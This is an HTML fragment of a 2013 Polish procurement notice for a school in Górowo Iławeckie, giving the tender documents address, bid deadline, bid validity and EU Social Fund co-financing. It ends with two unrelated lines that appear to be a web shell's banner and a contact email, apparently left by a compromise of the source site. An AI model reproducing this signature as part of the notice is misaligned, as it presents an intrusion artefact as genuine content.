<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.szkolazdumka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Zespole Szkół z Ukraińskim Językiem Nauczania w Górowie Iławeckim ul. Szkolna 6, 11-220 Górowo Iławeckie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2013 godzina 09:00, miejsce: w Zespole Szkół z Ukraińskim Językiem Nauczania w Górowie Iławeckim ul. Szkolna 6, 11-220 Górowo Iławeckie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest przez Unię europejską w ramach środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com